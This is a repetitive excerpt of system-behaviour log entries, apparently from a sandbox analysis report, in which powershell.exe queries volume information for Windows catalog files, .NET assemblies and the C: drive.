                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Windows-Defender-Management-Powershell-Group-WOW64-Package~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformation
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\ VolumeInformation
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\ VolumeInformation
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.ConsoleHost\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.ConsoleHost.dll VolumeInformation
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.dll VolumeInformation
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Numerics\v4.0_4.0.0.0__b77a5c561934e089\System.Numerics.dll VolumeInformation
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.DirectoryServices\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.DirectoryServices.dll VolumeInformation
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Management\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Management.dll VolumeInformation
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Security\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Security.dll VolumeInformation
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\ VolumeInformation
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-ds-Package~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-WOW64-Package~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.Management.Infrastructure.Native\v4.0_1.0.0.0__31bf3856ad364e35\Microsoft.Management.Infrastructure.Native.dll VolumeInformation
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-base-Package~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-base-Package~31bf3856ad364e35~amd64~en-US~10.0.17134.1.cat VolumeInformation
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Utility\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Utility.dll VolumeInformation
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Configuration.Install\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Configuration.Install.dll VolumeInformation
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Windows-Defender-Management-Powershell-Group-WOW64-Package~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Windows-Defender-Management-Powershell-Group-WOW64-Package~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformation
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\ VolumeInformation
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\ VolumeInformation
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.ConsoleHost\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.ConsoleHost.dll VolumeInformation
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.dll VolumeInformation
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Numerics\v4.0_4.0.0.0__b77a5c561934e089\System.Numerics.dll VolumeInformation
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.DirectoryServices\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.DirectoryServices.dll VolumeInformation
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Management\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Management.dll VolumeInformation
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Security\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Security.dll VolumeInformation
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\ VolumeInformation
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-ds-Package~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-WOW64-Package~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.Management.Infrastructure.Native\v4.0_1.0.0.0__31bf3856ad364e35\Microsoft.Management.Infrastructure.Native.dll VolumeInformation
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-base-Package~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-base-Package~31bf3856ad364e35~amd64~en-US~10.0.17134.1.cat VolumeInformation
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Utility\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Utility.dll VolumeInformation
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Configuration.Install\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Configuration.Install.dll VolumeInformation
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Windows-Defender-Management-Powershell-Group-WOW64-Package~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Windows-Defender-Management-Powershell-Group-WOW64-Package~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformation
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\ VolumeInformation
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.ConsoleHost\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.ConsoleHost.dll VolumeInformation
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.dll VolumeInformation
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Numerics\v4.0_4.0.0.0__b77a5c561934e089\System.Numerics.dll VolumeInformation
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.DirectoryServices\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.DirectoryServices.dll VolumeInformation
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Management\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Management.dll VolumeInformation
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Security\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Security.dll VolumeInformation
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-ds-Package~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-WOW64-Package~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.Management.Infrastructure.Native\v4.0_1.0.0.0__31bf3856ad364e35\Microsoft.Management.Infrastructure.Native.dll VolumeInformation
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-base-Package~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-base-Package~31bf3856ad364e35~amd64~en-US~10.0.17134.1.cat VolumeInformation
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Utility\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Utility.dll VolumeInformation
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Configuration.Install\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Configuration.Install.dll VolumeInformation
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Windows-Defender-Management-Powershell-Group-WOW64-Package~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Windows-Defender-Management-Powershell-Group-WOW64-Package~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformation
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
